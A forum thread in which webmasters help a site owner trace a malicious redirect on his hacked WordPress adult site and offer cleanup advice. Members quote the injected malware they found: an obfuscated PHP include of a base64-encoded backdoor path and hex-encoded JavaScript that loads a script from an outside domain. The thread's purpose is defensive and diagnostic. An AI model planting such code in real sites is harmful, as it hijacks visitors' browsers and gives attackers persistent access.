Redirection issue

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Chezter
    Confirmed User
    • Apr 2008
    • 565

    #1

    Redirection issue

    Hello, I hope someone here will help me. Today I was informed that there is redirection on my biggest site, but of course as usual I don't see anything from my computer and from proxies I tried, so I don't know what causes it. I have advertisement only from companies I always trusted, nastydollar and sextracker moneytree, there is also one trade script and that should be pretty much everything so I don't know where the redirection comes from and how long it hurts my site... Thanks for any help, the site is teen-porn-tube.com
    Last edited by Chezter; 12-14-2011, 11:34 AM.
  • Barry-xlovecam
    It's 42
    • Jun 2010
    • 18083

    #2
    This is what I found:

    Code:
    01:47:03.040	0.376	829	275	GET	302	Redirect to: http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4	http://speedclicks.ero-advertising.com/speedclicks/out.php?1=1&doc=IGVgu3Dty6GSAostqr8L2K4uQpGGG9kJqxw9NpiIUiRJTrqiDDR7dkadq3aCRibVgzMuMMTEaqRcdBHFUlYQV7PvWYodvBzt5kXjywSpa7HMidHXObQUYCj5dpH0TiRI&pid=29455&spaceid=134377&returnurl=http%3A%2F%2Fwww.adscampaign.com%2Fbanners.html&rcheck=MTMyMzg5NTA3Mg==
    
    01:47:03.613	0.193	540	203	GET	302	Redirect to: http://www.cam4.com?act=200116~us-c	http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4

    Comment

    • Chezter
      Confirmed User
      • Apr 2008
      • 565

      #3
      Ok thank you, but I still do not know how to figure out what is causing it from this peice of code, but at least I see it is really truth

      Comment

      • Colmike9
        (>^_^)b
        • Dec 2011
        • 7230

        #4
        If I were to hack a WP site, I would insert js in the header with an exploit, most likely in a template file. Check one of these from your header:

        teen-porn-tube.com/wp-content/themes/WPTube3/js/jquery-1.3.2.min.js
        teen-porn-tube.com/wp-content/themes/WPTube3/js/jqueryslidemenu/jqueryslidemenu.js
        Join the BEST cam affiliate program on the internet!
        I've referred over $1.7mil in spending this past year, you should join in.
        I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

        Comment

        • MikeFold
          Confirmed User
          • Nov 2001
          • 465

          #5
          went to your site via google search
          after the page loaded I
          got redirected here:

          http://17.uso2.com/

          edit/ now the browser that i left open in the background on your site is constantly bouncing between your page, a redirection page, and the target page (every 3 seconds)
          LOL
          Last edited by MikeFold; 12-14-2011, 12:07 PM.
          nothing to promote

          Comment

          • Colmike9
            (>^_^)b
            • Dec 2011
            • 7230

            #6
            Also, maybe check wp-content/themes/theme-name/header.php and see if there is anything different there than what you see in your source. Usually malicious redirects are js that look like gibberish


            Also, is that last line of js after html tag supposed to be there?..
            Join the BEST cam affiliate program on the internet!
            I've referred over $1.7mil in spending this past year, you should join in.
            I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

            Comment

            • Chezter
              Confirmed User
              • Apr 2008
              • 565

              #7
              I don't know any slider I use on my so I just deleted them, but they looked alright, the file had exact size as original and so...

              Comment

              • Chezter
                Confirmed User
                • Apr 2008
                • 565

                #8
                I see some strange piece of code right in the top of header.php so i put it away, is it still redirecting?

                Comment

                • Colmike9
                  (>^_^)b
                  • Dec 2011
                  • 7230

                  #9
                  It doesn't redirect for me anymore so I hope that fixed your problem
                  Join the BEST cam affiliate program on the internet!
                  I've referred over $1.7mil in spending this past year, you should join in.
                  I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

                  Comment

                  • Chezter
                    Confirmed User
                    • Apr 2008
                    • 565

                    #10
                    Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

                    Code:
                    <?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>

                    Comment

                    • Colmike9
                      (>^_^)b
                      • Dec 2011
                      • 7230

                      #11
                      Originally posted by Chezter
                      Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

                      Code:
                      <?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>
                      That's what I was thinking too but wasn't sure if you put it there or not. Are you using the latest version of WP (3.3) and maybe upgrade your php.

                      And change your passwords
                      Last edited by Colmike9; 12-14-2011, 01:22 PM.
                      Join the BEST cam affiliate program on the internet!
                      I've referred over $1.7mil in spending this past year, you should join in.
                      I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

                      Comment

                      • ruff
                        I have a plan B
                        • Aug 2004
                        • 5507

                        #12
                        Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.

                        <script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>
                        CryptoFeeds

                        Comment

                        • anexsia
                          Confirmed User
                          • May 2010
                          • 5735

                          #13
                          Originally posted by Chezter
                          Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

                          Code:
                          <?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>
                          Whenever you see encoded stuff like that it's usually bad, you can also use a decoder to see what the actually code was. There's a lot of "free" wordpress theme websites that will put stuff like this in the theme. Always go through your header and footer checking for it.

                          Comment

                          • Colmike9
                            (>^_^)b
                            • Dec 2011
                            • 7230

                            #14
                            Originally posted by ruff
                            Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.

                            <script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>
                            Thats the script under html that I was talking about, thought it was deleted.. My bad

                            Originally posted by Colmike7
                            Also, is that last line of js after html tag supposed to be there?..
                            Last edited by Colmike9; 12-14-2011, 01:41 PM.
                            Join the BEST cam affiliate program on the internet!
                            I've referred over $1.7mil in spending this past year, you should join in.
                            I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

                            Comment

                            • MediaGuy
                              Confirmed User
                              • Sep 2004
                              • 5500

                              #15
                              Yeah that injected script has been a problem with Wordpress in the past - but it's really because we're dumbasses and don't update and don't change passwords every now and then.

                              I don't know what your FTP client is Chezter but it probably uses a simple xml file to cache your log in to your server. Delete that cache or file or just blank the log-in fields out if you don't change your FTP password - it can be during uploads that the injector writes itself into your files/templates, or by accessing your wordpress templates as admin - and it propagates it to every page throughout your site.

                              To get rid of this one you're going to have to call your hosting tech support and tell them about the exploit. Before you call them, change your FTP password, change your Wordpress Password (change your admin username if you know how, "admin" default is just a security risk too), and let them know that you did.

                              And don't try to change anything (add a new post, FTP something to the server) until the tech department wipes it out.

                              When it happened to me I just called the hosting company and tech support had it taken out in a couple thousand pages in less than two minutes.

                              Oh, and update your version of wordpress.

                              YOU Are Industry News!
                              Press Releases: pr[at]payoutmag.com
                              Facebook: Payout Magazine! Facebook: MIKEB!
                              ICQ: 248843947
                              Skype: Mediaguy1

                              Comment

                              • Barry-xlovecam
                                It's 42
                                • Jun 2010
                                • 18083

                                #16
                                line 586 index.html

                                <!-- /wrapper -->



                                </body>

                                </html>

                                <script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>

                                Comment

                                • Chezter
                                  Confirmed User
                                  • Apr 2008
                                  • 565

                                  #17
                                  It is the same code, just it was not only in header but it is in footerm index, links... everywhere
                                  Last edited by Chezter; 12-15-2011, 07:09 AM.

                                  Comment

                                  • Chezter
                                    Confirmed User
                                    • Apr 2008
                                    • 565

                                    #18
                                    "Funny" is it is also in other domains on the same ftp account, just everywhere and it is there for 11 months that crazy, I would like to how I could never see it in any site...

                                    Comment

                                    • Chezter
                                      Confirmed User
                                      • Apr 2008
                                      • 565

                                      #19
                                      Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites is still redirecting or not. Thanks again all of you who helped me with this.

                                      Comment

                                      • MikeFold
                                        Confirmed User
                                        • Nov 2001
                                        • 465

                                        #20
                                        Originally posted by Chezter
                                        Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites is still redirecting or not. Thanks again all of you who helped me with this.
                                        ok...tried it for you again (different box and browser)
                                        it tried to hijack my browser.....i viewed source and this was still at the bottom

                                        Code:
                                        <script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>
                                        nothing to promote

                                        Comment

                                        • Barry-xlovecam
                                          It's 42
                                          • Jun 2010
                                          • 18083

                                          #21
                                          check the vision of your FTP program -- is it up to date?
                                          there was a problem like this a while back with old Filezilla apps -- maybe related

                                          Comment

                                          • Chezter
                                            Confirmed User
                                            • Apr 2008
                                            • 565

                                            #22
                                            I use total commander 7.04 and it is probably not up to date

                                            Comment

                                            • Chezter
                                              Confirmed User
                                              • Apr 2008
                                              • 565

                                              #23
                                              Reinstalled wordpress, reinstalled template, used new total commander, deleted everything I could so if it still there than I'm really fucked....

                                              Comment

                                              • Chezter
                                                Confirmed User
                                                • Apr 2008
                                                • 565

                                                #24
                                                I know I'm annoying, but is it still redirecting or not?

                                                Comment

                                                Working...